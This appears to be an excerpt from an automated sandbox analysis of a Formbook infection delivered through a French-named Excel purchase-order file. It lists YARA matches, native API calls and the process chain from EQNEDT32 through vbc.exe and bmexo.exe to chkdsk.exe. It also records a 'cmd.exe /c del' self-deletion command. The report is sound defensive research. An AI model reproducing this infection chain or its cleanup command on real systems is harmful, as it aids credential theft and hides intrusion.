          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F21890
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F296A0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F27E88
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F29C12
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2B3F1
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2C3BD
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2A184
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00160A2C
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040102F
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D8FD
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041E99C
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040927B
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041DAD0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00409280
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040DC20
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041EDF4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00402D88
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041DEEC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041E73A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F21890
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F2A184
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F2B3F1
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F2C3BD
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F29C12
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F296A0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F27E88
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009AE0C6
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009DD005
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009C905A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A2D06D
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B3040
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009AE2E9
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A51238
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A563BF
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009D63DB
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009AF3CF
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B2305
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B7353
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009FA37B
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009C1489
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009E5485
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A3443E
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009ED47D
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009CC5F0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B351F
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009F6540
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B4680
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009BE6C1
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A52622
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009FA634
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009BC7BC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A3579A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009E57C3
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A4F8EE
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009BC85C
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009D286D
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B29B2
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A5098E
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009C69FE
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A3394B
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A35955
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A63A83
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A5CBA4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A3DBDA
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009D7B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02441238
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239E2E9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A2305
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023EA37B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A7353
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023C63DB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239F3CF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_024463BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0241D06D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023CD005
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023B905A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A3040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239E0C6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023EA634
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02442622
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A4680
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023AE6C1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023AC7BC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242579A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023D57C3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023DD47D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242443E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023B1489
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023D5485
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A351F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023E6540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_024205E3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023BC5F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02453A83
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023C7B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02426BCB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242DBDA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0244CBA4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023C286D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023AC85C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0241F8C4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0243F8EE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242394B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02425955
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A29B2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023B69FE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0244098E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023D2E2F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023BEE4C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023B0F3F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023CDF7C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242BF14
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02412FDC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0243CFB1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242AC5E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023D0D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023ACD5B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0243FDDD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009927B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00099280
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AE73A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD8FD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AE99C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000ADAD0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009DC20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00092D88
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00092D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AEDF4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000ADEEC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00092FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0239E2A8 appears 58 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0240F970 appears 84 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 023E3F92 appears 132 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 023E373B appears 248 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0239DF5C appears 124 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 009F373B appears 186 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 009ADF5C appears 94 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 00F24599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 00F22400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 009AE2A8 appears 31 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 009F3F92 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 00A1F970 appears 66 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A310 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A3C0 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A440 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A4F0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A30A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A43A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A4EA NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A0060 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A1148 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099F938 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A1930 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023907AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02390078 NtResumeThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02390060 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02390048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023910D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02391148 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023901D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02391930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02390C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02391D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA310 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA3C0 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA440 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA4F0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA30A NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA43A NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA4EA NtAllocateVirtualMemory,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 77740000 page execute and read and write
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsxVirustotal: Detection: 38%
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsxReversingLabs: Detection: 26%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
